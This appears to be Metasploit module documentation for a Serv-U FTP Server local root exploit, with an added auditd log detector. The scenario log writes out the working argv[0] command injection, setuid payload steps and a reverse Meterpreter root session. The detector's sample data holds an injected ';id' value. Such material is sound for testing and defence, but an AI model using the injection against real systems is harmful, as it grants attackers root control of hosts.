## Description

  This module attempts to gain root privileges on systems running
  Serv-U FTP Server versions prior to 15.1.7.

  The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
  in a call to `system()`, without validation, when invoked with
  the `-prepareinstallation` flag, resulting in command execution
  with root privileges.
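
  For detection, the following is an added example (not part of the module or of Serv-U) that scans Linux audit records for `Serv-U -prepareinstallation` executions whose `argv[0]` contains anything other than path characters. It assumes auditd is recording `execve` with paired `SYSCALL` and `EXECVE` records; the sample lines are constructed and abbreviated, and the function and constant names are hypothetical.

```python
import re

SERVU_PATH = "/usr/local/Serv-U/Serv-U"        # module default (SERVU_PATH option)
SAFE_ARGV0 = re.compile(r"[A-Za-z0-9_./-]+")   # assumption: a legitimate argv[0] is a plain path
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
EVENT_ID = re.compile(r"msg=audit\(([^)]+)\)")
# Constructed, abbreviated audit records (not captured from a real host).
SAMPLE_LINES = [
    'type=SYSCALL msg=audit(1561780001.100:201): syscall=59 uid=1000 euid=0 exe="/usr/local/Serv-U/Serv-U"',
    'type=EXECVE msg=audit(1561780001.100:201): argc=2 a0=223B696422 a1="-prepareinstallation"',
    'type=SYSCALL msg=audit(1561780002.200:202): syscall=59 uid=0 euid=0 exe="/usr/local/Serv-U/Serv-U"',
    'type=EXECVE msg=audit(1561780002.200:202): argc=2 a0="/usr/local/Serv-U/Serv-U" a1="-prepareinstallation"',
    'type=SYSCALL msg=audit(1561780003.300:203): syscall=59 uid=1000 euid=1000 exe="/bin/ls"',
    'type=EXECVE msg=audit(1561780003.300:203): argc=2 a0=223B696422 a1="-l"',
]

def decode(value):
    """auditd quotes plain strings and hex-encodes values holding spaces, quotes or control bytes."""
    if value.startswith('"'):
        return value[1:-1]
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value  # bare non-hex field such as a counter

def suspicious_servu_execs(lines, servu_path=SERVU_PATH):
    """Return (event_id, argv0) for Serv-U -prepareinstallation runs with an unsafe argv[0]."""
    events = {}
    for line in lines:
        match = EVENT_ID.search(line)
        if not match:
            continue
        # SYSCALL carries the real executable path; EXECVE carries the caller-chosen argv.
        event = events.setdefault(match.group(1), {"exe": None, "argv": {}})
        fields = dict(FIELD.findall(line))
        if fields.get("type") == "SYSCALL":
            event["exe"] = decode(fields.get("exe", '""'))
        elif fields.get("type") == "EXECVE":
            for key, value in fields.items():
                if re.fullmatch(r"a\d+", key):
                    event["argv"][int(key[1:])] = decode(value)
    hits = []
    for event_id, event in events.items():
        argv = [event["argv"][i] for i in sorted(event["argv"])]
        if (event["exe"] == servu_path and "-prepareinstallation" in argv[1:]
                and not SAFE_ARGV0.fullmatch(argv[0])):
            hits.append((event_id, argv[0]))
    return hits

if __name__ == "__main__":
    print(suspicious_servu_execs(SAMPLE_LINES))
```

  Only the first sample event is reported: the second has a plain path as `argv[0]`, and the third is a different executable.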


## Vulnerable Application

  [Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
  is an FTP server for Linux and Windows; however, this module
  targets only Linux systems.

  This module has been tested successfully on:

  * Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SERVU_PATH**

  Path to the `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)

  **WritableDir**

  File system path to a writable directory (default: `/tmp`)


## Scenarios

### Debian 9.6 (x64)

  ```
  msf5 exploit(multi/handler) > back
  msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc 
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] bash shell is available
  [+] /usr/local/Serv-U/Serv-U is executable
  [+] /usr/local/Serv-U/Serv-U is setuid
  [*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
  [*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
  [+] /tmp/.24HnCiwSby setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (985320 bytes) to 172.16.191.250

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
  [-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > 
  ```

